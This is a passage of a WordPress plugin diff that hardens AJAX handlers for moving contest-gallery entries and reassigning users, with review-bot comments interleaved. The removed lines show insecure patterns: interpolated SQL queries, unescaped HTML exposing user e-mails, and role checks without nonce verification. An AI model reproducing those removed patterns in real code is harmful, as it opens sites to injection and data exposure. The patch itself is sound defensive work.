+        wp_send_json_success(array(
+            'allCategoriesByGalleryID' => $allCategoriesByGalleryIDArray,
+            'galleryIDs' => $galleryIDs,
+            'contact_forms_by_gallery_id' => $contact_forms_by_gallery_id
+        ));

         }
-}
+	}

 // move to another gallery
 add_action('wp_ajax_post_cg_move_to_another_gallery', 'post_cg_move_to_another_gallery');
 if (!function_exists('post_cg_move_to_another_gallery')) {
 	function post_cg_move_to_another_gallery()
 	{
+		cg_backend_ajax_require_access_json();
 		contest_gal1ery_db_check();

 		$_POST = cg1l_sanitize_post($_POST);

-		$isBackendCall = true;
-		$isAjaxCall = true;
-
-		$isAjaxCategoriesCall = true;
-
-		global $wp_version;
-		$sanitize_textarea_field = ($wp_version < 4.7) ? 'sanitize_text_field' : 'sanitize_textarea_field';
+		$cgMoveRealId = (!empty($_POST['cgMoveRealId'])) ? absint($_POST['cgMoveRealId']) : 0;
+		$InGalleryIDtoMove = (!empty($_POST['cg_in_gallery_id_to_move'])) ? absint($_POST['cg_in_gallery_id_to_move']) : 0;
+		$MoveFromGalleryID = (!empty($_POST['cgMoveFromGalleryID'])) ? absint($_POST['cgMoveFromGalleryID']) : 0;
+		$cgMoveCategory = (!empty($_POST['cgMoveCategory'])) ? absint($_POST['cgMoveCategory']) : 0;
+		$MoveAssignsRaw = (!empty($_POST['cgMoveAssigns']) && is_array($_POST['cgMoveAssigns'])) ? $_POST['cgMoveAssigns'] : array();
+		$galleryHash = (!empty($_POST['cgGalleryHash'])) ? $_POST['cgGalleryHash'] : '';

-		$cgVersion = cg_get_version_for_scripts();
+		cg_backend_ajax_validate_gallery_hash_json($MoveFromGalleryID, $galleryHash);

-		if (defined('DOING_AJAX') && DOING_AJAX) {
-
-			$user = wp_get_current_user();
+		if (empty($cgMoveRealId) || empty($InGalleryIDtoMove) || empty($MoveFromGalleryID)) {
+			cg_backend_ajax_error_json('Missing move request data.', 400, 'cg_missing_move_data');
+		}

-			if (
-				is_super_admin($user->ID) ||
-				in_array('administrator', (array)$user->roles) ||
-				in_array('editor', (array)$user->roles) ||
-				in_array('author', (array)$user->roles)
-			) {
+		if ($InGalleryIDtoMove == $MoveFromGalleryID) {
+			cg_backend_ajax_error_json('Entry can not be moved to the same gallery.', 400, 'cg_same_gallery_move');
+		}

-				$cgMoveRealId = absint($_POST['cgMoveRealId']);
-				$InGalleryIDtoMove = absint($_POST['cg_in_gallery_id_to_move']);
-				$MoveFromGalleryID = absint($_POST['cgMoveFromGalleryID']);
-				$cgMoveCategory = absint($_POST['cgMoveCategory']);
-				$MoveAssigns = $_POST['cgMoveAssigns'];
+		global $wpdb;
+		$table_posts = $wpdb->prefix . "posts";
+		$tablename = $wpdb->prefix . "contest_gal1ery";
+		$tablename_options = $wpdb->prefix . "contest_gal1ery_options";
+		$tablename_comments = $wpdb->prefix . "contest_gal1ery_comments";
+		$tablename_entries = $wpdb->prefix . 'contest_gal1ery_entries';
+		$tablename_ip = $wpdb->prefix . "contest_gal1ery_ip";
+		$tablename_form_input = $wpdb->prefix . "contest_gal1ery_f_input";
+		$tablename_categories = $wpdb->prefix . "contest_gal1ery_categories";
+
+		$sourceGalleryExists = $wpdb->get_var($wpdb->prepare("SELECT COUNT(*) FROM $tablename_options WHERE id = %d", $MoveFromGalleryID));
+		if (empty($sourceGalleryExists)) {
+			cg_backend_ajax_error_json('Source gallery does not exist.', 400, 'cg_source_gallery_missing');
+		}

-				global $wpdb;
-				$table_posts = $wpdb->prefix . "posts";
-				$tablename = $wpdb->prefix . "contest_gal1ery";
-				$tablename_options = $wpdb->prefix . "contest_gal1ery_options";
-				$tablename_comments = $wpdb->prefix . "contest_gal1ery_comments";
-				$tablename_entries = $wpdb->prefix . 'contest_gal1ery_entries';
-				$tablename_ip = $wpdb->prefix . "contest_gal1ery_ip";
+		$optionsInGalleryToMove = $wpdb->get_row($wpdb->prepare("SELECT * FROM $tablename_options WHERE id = %d ORDER BY id DESC LIMIT 0, 1", $InGalleryIDtoMove));
+		if (empty($optionsInGalleryToMove)) {
+			cg_backend_ajax_error_json('Target gallery does not exist.', 400, 'cg_target_gallery_missing');
+		}

-				$insert_id = cg_copy_table_row('contest_gal1ery',$cgMoveRealId, $valueCollect = [], $cgCopyType = '');
+		$rowToMove = $wpdb->get_row($wpdb->prepare("SELECT * FROM $tablename WHERE id = %d AND GalleryID = %d", $cgMoveRealId, $MoveFromGalleryID));
+		if (empty($rowToMove)) {
+			cg_backend_ajax_error_json('Entry does not belong to the selected source gallery.', 400, 'cg_entry_source_mismatch');
+		}

-				$Version = cg_get_version_for_scripts();
+		if (!empty($rowToMove->EcommerceEntry)) {
+			cg_backend_ajax_error_json('E-commerce entries can not be moved to another gallery.', 400, 'cg_ecommerce_entry_move_blocked');
+		}

-				$wpdb->update(
-					"$tablename",
-					array('Version' => $Version,'GalleryID' => $InGalleryIDtoMove),
-					array('id' => $insert_id),
-					array('%s'),
-					array('%d')
-				);
+		if (!empty($cgMoveCategory)) {
+			$categoryExists = $wpdb->get_var($wpdb->prepare("SELECT COUNT(*) FROM $tablename_categories WHERE id = %d AND GalleryID = %d", $cgMoveCategory, $InGalleryIDtoMove));
+			if (empty($categoryExists)) {
+				cg_backend_ajax_error_json('Selected target category does not belong to the target gallery.', 400, 'cg_target_category_mismatch');
+			}
+		}

-				$row = $wpdb->get_row("SELECT * FROM $tablename WHERE id = $insert_id");
+		$MoveAssigns = array();
+		if (!empty($MoveAssignsRaw)) {
+			$formInputs = $wpdb->get_results($wpdb->prepare("SELECT id, GalleryID, Field_Type FROM $tablename_form_input WHERE GalleryID IN (%d,%d)", $MoveFromGalleryID, $InGalleryIDtoMove));
+			$sourceFields = array();
+			$targetFields = array();
+			foreach ($formInputs as $formInput) {
+				if (absint($formInput->GalleryID) == $MoveFromGalleryID) {
+					$sourceFields[absint($formInput->id)] = $formInput->Field_Type;
+				} elseif (absint($formInput->GalleryID) == $InGalleryIDtoMove) {
+					$targetFields[absint($formInput->id)] = $formInput->Field_Type;
+				}
+			}

-				// Delete previous entry because inserted as new one through cg_copy_table_row
-				$wpdb->query("DELETE FROM $tablename WHERE id = $cgMoveRealId");
+			$allowedMoveFieldTypes = array('date-f', 'text-f', 'url-f', 'email-f', 'comment-f', 'select-f', 'radio-f', 'chk-f');
+			$usedTargetFields = array();
+			foreach ($MoveAssignsRaw as $FromInput => $ToInput) {
+				$FromInput = absint($FromInput);
+				$ToInput = absint($ToInput);

-                // delete WpPages now
-				if(!empty($row->WpPage)){
-					wp_delete_post($row->WpPage,true);
+				if (empty($FromInput) || empty($ToInput)) {
+					cg_backend_ajax_error_json('Invalid field assignment data.', 400, 'cg_invalid_move_assignment');
 				}
-				if(!empty($row->WpPageUser)){
-					wp_delete_post($row->WpPageUser,true);
+				if (empty($sourceFields[$FromInput]) || empty($targetFields[$ToInput])) {
+					cg_backend_ajax_error_json('Field assignment does not belong to the selected galleries.', 400, 'cg_move_assignment_gallery_mismatch');
 				}
-				if(!empty($row->WpPageNoVoting)){
-					wp_delete_post($row->WpPageNoVoting,true);
+				if (!in_array($sourceFields[$FromInput], $allowedMoveFieldTypes, true) || $sourceFields[$FromInput] != $targetFields[$ToInput]) {
+					cg_backend_ajax_error_json('Field assignment types do not match.', 400, 'cg_move_assignment_type_mismatch');
 				}
-				if(!empty($row->WpPageWinner)){
-					wp_delete_post($row->WpPageWinner,true);
-				}
-				if(!empty($row->WpPageEcommerce)){
-					wp_delete_post($row->WpPageEcommerce,true);
+				if (!empty($usedTargetFields[$ToInput])) {
+					cg_backend_ajax_error_json('A target field can only be assigned once.', 400, 'cg_move_assignment_duplicate_target');
 				}

-                // Update parents
-				$optionsInGalleryToMove = $wpdb->get_row("SELECT * FROM $tablename_options WHERE id = $InGalleryIDtoMove ORDER BY id DESC LIMIT 0, 1");
+				$MoveAssigns[$FromInput] = $ToInput;
+				$usedTargetFields[$ToInput] = true;
+			}
+		}

-				if(!empty($optionsInGalleryToMove->WpPageParent)) {
-					$post_title = substr($row->NamePic,0,100);
-					cg_create_wp_pages($InGalleryIDtoMove,$insert_id,$post_title,$optionsInGalleryToMove,$optionsInGalleryToMove->Version);
-				}
+		$insert_id = cg_copy_table_row('contest_gal1ery',$cgMoveRealId, $valueCollect = [], $cgCopyType = '');
+		if (empty($insert_id)) {
+			cg_backend_ajax_error_json('Entry could not be copied to the target gallery.', 500, 'cg_move_copy_failed');
+		}

-				if(!empty($cgMoveCategory)){
-					$wpdb->query("UPDATE $tablename SET Category=$cgMoveCategory WHERE id = $insert_id");
-				}else{
-					$wpdb->query("UPDATE $tablename SET Category=0 WHERE id = $insert_id");
-				}
+		$Version = cg_get_version_for_scripts();

-				$wpdb->query("UPDATE $tablename_ip SET pid=$insert_id, GalleryID = $InGalleryIDtoMove WHERE pid=$cgMoveRealId");
-				$wpdb->query("UPDATE $tablename_comments SET pid=$insert_id, GalleryID = $InGalleryIDtoMove WHERE pid=$cgMoveRealId");
-				$wpdb->query("UPDATE $tablename_entries SET pid=$insert_id, GalleryID = $InGalleryIDtoMove WHERE pid=$cgMoveRealId");
-
-				$input_ids_entries_to_delete = $wpdb->get_results("SELECT id, f_input_id FROM $tablename_entries WHERE pid  = $insert_id");
-				$input_ids_entries_to_delete_array = [];
-                foreach ($input_ids_entries_to_delete as $entry){
-	                $input_ids_entries_to_delete_array[$entry->f_input_id] = $entry->id;
-                }
+		$updated = $wpdb->update(
+			"$tablename",
+			array('Version' => $Version,'GalleryID' => $InGalleryIDtoMove),
+			array('id' => $insert_id),
+			array('%s','%d'),
+			array('%d')
+		);
+
+		if ($updated === false) {
+			$wpdb->delete($tablename, array('id' => $insert_id), array('%d'));
+			cg_backend_ajax_error_json('Copied entry could not be assigned to the target gallery.', 500, 'cg_move_assign_gallery_failed');
+		}

-                if(!empty($MoveAssigns)){// have to be checked with not empty
-                    // now change the input ids if were assigned
-	                foreach ($MoveAssigns as $FromInput => $ToInput){
-		                $FromInput = absint($FromInput);
-		                $ToInput = absint($ToInput);
-		                $wpdb->query("UPDATE $tablename_entries SET f_input_id = $ToInput WHERE pid = $insert_id && f_input_id = $FromInput");
-                        if(isset($input_ids_entries_to_delete_array[$FromInput])){
-	                        unset($input_ids_entries_to_delete_array[$FromInput]);
-                        }
-	                }
-                }
+		$row = $wpdb->get_row($wpdb->prepare("SELECT * FROM $tablename WHERE id = %d", $insert_id));
+		if (empty($row)) {
+			cg_backend_ajax_error_json('Moved entry could not be loaded.', 500, 'cg_move_row_missing');
+		}

-				foreach ($input_ids_entries_to_delete_array as $f_input_id => $entryId) {
-					$wpdb->query("DELETE FROM $tablename_entries WHERE id = $entryId");
-                }
+		$wpdb->delete($tablename, array('id' => $cgMoveRealId, 'GalleryID' => $MoveFromGalleryID), array('%d','%d'));

-				$wp_upload_dir = wp_upload_dir();
-                // unlink activated entries if exists
-				if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-data/image-data-".$cgMoveRealId.".json")){
-					unlink($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-data/image-data-".$cgMoveRealId.".json");
-				}
-				if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-info/image-info-".$cgMoveRealId.".json")){
-					unlink($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-info/image-info-".$cgMoveRealId.".json");
-				}
-                // move file
-				if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/image-comments-".$cgMoveRealId.".json")){
-                    if(!is_dir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments")){
-	                    mkdir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments",0755,true);
-                    }
-					rename($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/image-comments-".$cgMoveRealId.".json", $wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/image-comments-".$insert_id.".json");
-				}
-                // move folder
-				if(is_dir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/ids/".$cgMoveRealId)){
-					if(!is_dir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/ids")){
-						mkdir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/ids",0755,true);
-                    }
-					rename($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/ids/".$cgMoveRealId, $wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/ids/".$insert_id);
-				}
+		// delete WpPages now
+		if(!empty($row->WpPage)){
+			wp_delete_post($row->WpPage,true);
+		}
+		if(!empty($row->WpPageUser)){
+			wp_delete_post($row->WpPageUser,true);
+		}
+		if(!empty($row->WpPageNoVoting)){
+			wp_delete_post($row->WpPageNoVoting,true);
+		}
+		if(!empty($row->WpPageWinner)){
+			wp_delete_post($row->WpPageWinner,true);
+		}
+		if(!empty($row->WpPageEcommerce)){
+			wp_delete_post($row->WpPageEcommerce,true);
+		}

-				cg_json_upload_form_info_data_files_new($InGalleryIDtoMove,[$insert_id],true);
+		// Update parents
+		if(!empty($optionsInGalleryToMove->WpPageParent)) {
+			$post_title = substr($row->NamePic,0,100);
+			cg_create_wp_pages($InGalleryIDtoMove,$insert_id,$post_title,$optionsInGalleryToMove,$optionsInGalleryToMove->Version);
+		}

-                if($row->Active==1){
-	                $collect = "$tablename.id = ".$row->id;
-	                $GalleryID = $row->GalleryID;
-	                $row = $wpdb->get_row( "SELECT DISTINCT $table_posts.*, $tablename.* FROM $table_posts, $tablename WHERE
-                                              (($collect) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' and $table_posts.ID = $tablename.WpUpload)
-                                              OR
-                                              (($collect) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' AND $tablename.WpUpload = 0)
-                                          GROUP BY $tablename.id  ORDER BY $tablename.id DESC LIMIT 0, 1");
-	                cg_create_json_files_when_activating($InGalleryIDtoMove,$row);
-                }
+		$wpdb->update($tablename, array('Category' => $cgMoveCategory), array('id' => $insert_id), array('%d'), array('%d'));

-				die;
+		$wpdb->update($tablename_ip, array('pid' => $insert_id, 'GalleryID' => $InGalleryIDtoMove), array('pid' => $cgMoveRealId, 'GalleryID' => $MoveFromGalleryID), array('%d','%d'), array('%d','%d'));
+		$wpdb->update($tablename_comments, array('pid' => $insert_id, 'GalleryID' => $InGalleryIDtoMove), array('pid' => $cgMoveRealId, 'GalleryID' => $MoveFromGalleryID), array('%d','%d'), array('%d','%d'));
+		$wpdb->update($tablename_entries, array('pid' => $insert_id, 'GalleryID' => $InGalleryIDtoMove), array('pid' => $cgMoveRealId, 'GalleryID' => $MoveFromGalleryID), array('%d','%d'), array('%d','%d'));
+
+		$input_ids_entries_to_delete = $wpdb->get_results($wpdb->prepare("SELECT id, f_input_id FROM $tablename_entries WHERE pid = %d", $insert_id));
+		$input_ids_entries_to_delete_array = [];
+		foreach ($input_ids_entries_to_delete as $entry){
+			$input_ids_entries_to_delete_array[$entry->f_input_id] = $entry->id;
+		}

-			} else {
-				echo "<div id='cgSaveCategoriesCouldNotBeChanged'><h2>MISSINGRIGHTS<br>post_cg_social_platform_input can be edited only as administrator, editor or author.</h2></div>";
-				exit();
+		if(!empty($MoveAssigns)){
+			foreach ($MoveAssigns as $FromInput => $ToInput){
+				$wpdb->query($wpdb->prepare("UPDATE $tablename_entries SET f_input_id = %d WHERE pid = %d AND f_input_id = %d", $ToInput, $insert_id, $FromInput));
+				if(isset($input_ids_entries_to_delete_array[$FromInput])){
+					unset($input_ids_entries_to_delete_array[$FromInput]);
+				}
 			}
+		}

-			exit();
-		} else {
-			exit();
+		foreach ($input_ids_entries_to_delete_array as $f_input_id => $entryId) {
+			$wpdb->query($wpdb->prepare("DELETE FROM $tablename_entries WHERE id = %d", $entryId));
+		}
+
+		$wp_upload_dir = wp_upload_dir();
+		// unlink activated entries if exists
+		if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-data/image-data-".$cgMoveRealId.".json")){
+			unlink($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-data/image-data-".$cgMoveRealId.".json");
+		}
+		if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-stats/image-stats-".$cgMoveRealId.".json")){
+			unlink($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-stats/image-stats-".$cgMoveRealId.".json");
 		}
+		if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-info/image-info-".$cgMoveRealId.".json")){
+			unlink($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-info/image-info-".$cgMoveRealId.".json");
+		}
+		// move file
+		if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/image-comments-".$cgMoveRealId.".json")){
+			if(!is_dir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments")){
+				mkdir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments",0755,true);
+			}
+			rename($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/image-comments-".$cgMoveRealId.".json", $wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/image-comments-".$insert_id.".json");
+		}
+		// move folder
+		if(is_dir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/ids/".$cgMoveRealId)){
+			if(!is_dir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/ids")){
+				mkdir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/ids",0755,true);
+			}
+			rename($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/ids/".$cgMoveRealId, $wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/ids/".$insert_id);
+		}
+
+		cg_json_upload_form_info_data_files_new($InGalleryIDtoMove,[$insert_id],true);
+
+		if($row->Active==1){
+			$GalleryID = $row->GalleryID;
+			$rowForJson = $wpdb->get_row($wpdb->prepare(
+				"SELECT DISTINCT $table_posts.*, $tablename.* FROM $table_posts, $tablename WHERE
+				 (($tablename.id = %d) AND $tablename.GalleryID = %d AND $tablename.Active = '1' and $table_posts.ID = $tablename.WpUpload)
+				 OR
+				 (($tablename.id = %d) AND $tablename.GalleryID = %d AND $tablename.Active = '1' AND $tablename.WpUpload = 0)
+				 GROUP BY $tablename.id ORDER BY $tablename.id DESC LIMIT 0, 1",
+				$row->id, $GalleryID, $row->id, $GalleryID
+			));
+			if (!empty($rowForJson)) {
+				cg_create_json_files_when_activating($InGalleryIDtoMove,$rowForJson);
+			}
+		}
+
+		wp_send_json_success(array(
+			'entry_id' => $cgMoveRealId,
+			'new_entry_id' => $insert_id,
+			'target_gallery_id' => $InGalleryIDtoMove
+		));
 	}
 }
 // move to another gallery---- END
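
Review bot: the access and hash checks at the top of post_cg_move_to_another_gallery are the right fix, but once the source row is gone (`$wpdb->delete($tablename, array('id' => $cgMoveRealId, 'GalleryID' => $MoveFromGalleryID), ...)`) none of the remaining steps check their return values: the three `$wpdb->update()` calls that re-point `contest_gal1ery_ip`, `_comments` and `_entries` from `$cgMoveRealId` to `$insert_id`, and the `mkdir`/`rename` calls that move the image-comments JSON. A failure there leaves comment rows, IP rows or JSON files orphaned under the source gallery while the client still receives `wp_send_json_success`. Suggest checking those results and reporting through `cg_backend_ajax_error_json()`, as is already done for the copy and the first update, or deferring the source-row delete until the dependent updates have succeeded. Minor: `cg_backend_ajax_validate_gallery_hash_json($MoveFromGalleryID, $galleryHash)` runs before the `empty(...)` check on the IDs, so a request without `cgMoveFromGalleryID` is rejected as a hash failure rather than as `cg_missing_move_data`; swapping the two checks gives the clearer error.
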
@@ -802,15 +921,15 @@

 	            $post_title = substr(cg_pre_process_name_for_url_name($post_title),0,100);

-            $array = [
+	            $array = [
                     'post_title'=> $post_title,
-	            'post_name'=> $post_name,
+                    'post_name'=> $post_name,
                     'guid'=> $guid,
                     'post_type'=>$post_type,
                     'post_content'=>$post_content,
                     'post_mime_type'=>$post_mime_type,
-	            'post_status'=>'publish'
-            ];
+                    'post_status'=>'publish'
+                ];

 	            $postId = wp_insert_post($array);

@@ -860,7 +979,6 @@
 	    global $wp_version;
 	    $sanitize_textarea_field = ($wp_version < 4.7) ? 'sanitize_text_field' : 'sanitize_textarea_field';

-
 	    if (defined('DOING_AJAX') && DOING_AJAX) {

 		    $user = wp_get_current_user();
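
Review bot: this hunk only drops a blank line, but the surrounding context shows the handler still gated by the inline `if (defined('DOING_AJAX') && DOING_AJAX) { $user = wp_get_current_user(); ...` role check rather than `cg_backend_ajax_require_access_json()`. Since the point of the patch is to centralize that check, this handler should be migrated to the helper as well, or the reason for leaving it should be documented, so that the login, backend-access and nonce requirements are applied uniformly across the AJAX handlers.
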
@@ -986,9 +1104,7 @@
 // youtube add to gallery ---- END

 // sort files
-
 add_action('wp_ajax_post_cg_gallery_sort_files', 'post_cg_gallery_sort_files');
-
 if (!function_exists('post_cg_gallery_sort_files')) {
     function post_cg_gallery_sort_files()
     {
@@ -1033,36 +1149,42 @@
 if (!function_exists('post_cg_attach_to_another_user_select')) {
 	function post_cg_attach_to_another_user_select()
 	{
-		if (defined('DOING_AJAX') && DOING_AJAX) {
-
-			$user = wp_get_current_user();
-
-			if (
-				is_super_admin($user->ID) ||
-				in_array('administrator', (array)$user->roles) ||
-				in_array('editor', (array)$user->roles) ||
-				in_array('author', (array)$user->roles)
-			) {
-				global $wpdb;
-
-				$wpUsers = $wpdb->base_prefix . "users";
-				$selectWPusers = $wpdb->get_results("SELECT ID, user_login, user_email FROM $wpUsers WHERE ID > 0 ORDER BY ID ASC");
-
-                echo "<select id='cgAttachToAnotherUserSelect' name='cgAttachToAnotherUserId' class='cg_no_outline_and_shadow_on_focus'>";
-                    foreach ($selectWPusers as $user){
-                        echo "<option value='$user->ID' data-user_login='$user->user_login' data-user_email='$user->user_email'>$user->user_login - $user->user_email (ID: $user->ID)</option>";
-                    }
-                echo "</select>";
+		cg_backend_ajax_require_access_json();
+		$_POST = cg1l_sanitize_post($_POST);

-			} else {
-				echo "<div ><h2>MISSINGRIGHTS<br>This area can be edited only as administrator, editor or author.</h2></div>";
-				exit();
-			}
+		$GalleryID = (!empty($_POST['GalleryID'])) ? absint($_POST['GalleryID']) : 0;
+		$galleryHash = (!empty($_POST['cgGalleryHash'])) ? $_POST['cgGalleryHash'] : '';
+		$cgUserSearch = (!empty($_POST['cgUserSearch'])) ? sanitize_text_field($_POST['cgUserSearch']) : '';
+
+		cg_backend_ajax_validate_gallery_hash_json($GalleryID, $galleryHash);
+
+		global $wpdb;
+
+		$wpUsers = $wpdb->base_prefix . "users";
+		if (!empty($cgUserSearch)) {
+			$like = '%' . $wpdb->esc_like($cgUserSearch) . '%';
+			$selectWPusers = $wpdb->get_results($wpdb->prepare("SELECT ID, user_login FROM $wpUsers WHERE ID > 0 AND (user_login LIKE %s OR user_email LIKE %s) ORDER BY user_login ASC LIMIT 20", $like, $like));
+		} else {
+			$selectWPusers = $wpdb->get_results("SELECT ID, user_login FROM $wpUsers WHERE ID > 0 ORDER BY ID ASC LIMIT 20");
+		}

-			exit();
+		$html = "<select id='cgAttachToAnotherUserSelect' name='cgAttachToAnotherUserId' class='cg_no_outline_and_shadow_on_focus'>";
+		if (empty($selectWPusers)) {
+			$html .= "<option value='' disabled selected>No users found</option>";
 		} else {
-			exit();
+			$isFirst = true;
+			foreach ($selectWPusers as $user){
+				$selected = ($isFirst) ? ' selected' : '';
+				$html .= "<option value='" . esc_attr($user->ID) . "' data-user_login='" . esc_attr($user->user_login) . "'" . $selected . ">" . esc_html($user->user_login) . " (ID: " . esc_html($user->ID) . ")</option>";
+				$isFirst = false;
+			}
 		}
+		$html .= "</select>";
+
+		wp_send_json_success(array(
+			'html' => $html,
+			'has_results' => (!empty($selectWPusers))
+		));
 	}
 }
 // attach to another user select --- END
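
Review bot: the `<option>` markup no longer emits `data-user_email` or the e-mail address in the label (the removed line did both; the new one emits only `data-user_login` and the login), which is a welcome reduction in exposed data, but any client-side code that read `data-user_email` from `#cgAttachToAnotherUserSelect` will now get undefined; confirm the backend JS was updated together with this change. Also, both queries cap the result at `LIMIT 20` and the no-search branch orders by `ID ASC`, so on sites with more than 20 users the initial dropdown silently omits the rest and `has_results` does not signal the truncation; either add a `truncated` flag to the JSON response or document that the search box is the intended way to reach the remaining users.
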
@@ -1072,52 +1194,78 @@
 if (!function_exists('post_cg_attach_to_another_user')) {
 	function post_cg_attach_to_another_user()
 	{
-		if (defined('DOING_AJAX') && DOING_AJAX) {
+		cg_backend_ajax_require_access_json();
+		$_POST = cg1l_sanitize_post($_POST);

-			$user = wp_get_current_user();
+		global $wpdb;

-			if (
-				is_super_admin($user->ID) ||
-				in_array('administrator', (array)$user->roles) ||
-				in_array('editor', (array)$user->roles) ||
-				in_array('author', (array)$user->roles)
-			) {
-				global $wpdb;
-
-				$tablename = $wpdb->prefix . "contest_gal1ery";
-				$table_posts = $wpdb->prefix . "posts";
-				#$wpUsers = $wpdb->prefix . "users";
-
-				$WpUserId = absint($_POST['cgAttachToAnotherUserId']);
-				$pid = absint($_POST['cgEntryId']);
-				$GalleryID = absint($_POST['GalleryID']);
-
-				$wpdb->query("UPDATE $tablename SET WpUserId=$WpUserId WHERE id = $pid");
-
-				$Active = $wpdb->get_var( "SELECT Active FROM $tablename WHERE id = $pid");
-
-                if($Active==1){
-	                $row = $wpdb->get_row( "SELECT DISTINCT $table_posts.*, $tablename.* FROM $table_posts, $tablename WHERE
-                          (($tablename.id = $pid) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' and $table_posts.ID = $tablename.WpUpload)
-                          OR
-                          (($tablename.id = $pid) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' AND $tablename.WpUpload = 0)
-                          GROUP BY $tablename.id  ORDER BY $tablename.id DESC LIMIT 0, 1");
-	                cg_create_json_files_when_activating($GalleryID,$row);
-                }
+		$tablename = $wpdb->prefix . "contest_gal1ery";
+		$tablename_options = $wpdb->prefix . "contest_gal1ery_options";
+		$table_posts = $wpdb->prefix . "posts";
+
+		$WpUserId = (isset($_POST['cgAttachToAnotherUserId'])) ? absint($_POST['cgAttachToAnotherUserId']) : 0;
+		$pid = (!empty($_POST['cgEntryId'])) ? absint($_POST['cgEntryId']) : 0;
+		$GalleryID = (!empty($_POST['GalleryID'])) ? absint($_POST['GalleryID']) : 0;
+		$galleryHash = (!empty($_POST['cgGalleryHash'])) ? $_POST['cgGalleryHash'] : '';
+
+		cg_backend_ajax_validate_gallery_hash_json($GalleryID, $galleryHash);
+
+		if (empty($pid) || empty($GalleryID)) {
+			cg_backend_ajax_error_json('Missing user assignment data.', 400, 'cg_missing_attach_data');
+		}

-				#$wpUser = $wpdb->get_row("SELECT user_login, user_email FROM $wpUsers WHERE ID = $WpUserId");
-				//echo "###".$wpUser->user_login." - ".$wpUser->user_email."###";
-				echo "###post_cg_attach_to_another_user successful###";
-
-			} else {
-				echo "<div ><h2>MISSINGRIGHTS<br>This area can be edited only as administrator, editor or author.</h2></div>";
-				exit();
+		$galleryExists = $wpdb->get_var($wpdb->prepare("SELECT COUNT(*) FROM $tablename_options WHERE id = %d", $GalleryID));
+		if (empty($galleryExists)) {
+			cg_backend_ajax_error_json('Gallery does not exist.', 400, 'cg_attach_gallery_missing');
+		}
+
+		$rowToUpdate = $wpdb->get_row($wpdb->prepare("SELECT * FROM $tablename WHERE id = %d AND GalleryID = %d", $pid, $GalleryID));
+		if (empty($rowToUpdate)) {
+			cg_backend_ajax_error_json('Entry does not belong to the selected gallery.', 400, 'cg_attach_entry_gallery_mismatch');
+		}
+
+		$user_login = '';
+		if (!empty($WpUserId)) {
+			$wpUser = get_user_by('id', $WpUserId);
+			if (empty($wpUser)) {
+				cg_backend_ajax_error_json('Selected user does not exist.', 400, 'cg_attach_user_missing');
 			}
+			$user_login = $wpUser->user_login;
+		}

-			exit();
-		} else {
-			exit();
+		$updated = $wpdb->update(
+			$tablename,
+			array('WpUserId' => $WpUserId),
+			array('id' => $pid, 'GalleryID' => $GalleryID),
+			array('%d'),
+			array('%d','%d')
+		);
+
+		if ($updated === false) {
+			cg_backend_ajax_error_json('User assignment could not be saved.', 500, 'cg_attach_update_failed');
 		}
+
+		if($rowToUpdate->Active==1){
+			$row = $wpdb->get_row($wpdb->prepare(
+				"SELECT DISTINCT $table_posts.*, $tablename.* FROM $table_posts, $tablename WHERE
+				  (($tablename.id = %d) AND $tablename.GalleryID = %d AND $tablename.Active = '1' and $table_posts.ID = $tablename.WpUpload)
+				  OR
+				  (($tablename.id = %d) AND $tablename.GalleryID = %d AND $tablename.Active = '1' AND $tablename.WpUpload = 0)
+				  GROUP BY $tablename.id ORDER BY $tablename.id DESC LIMIT 0, 1",
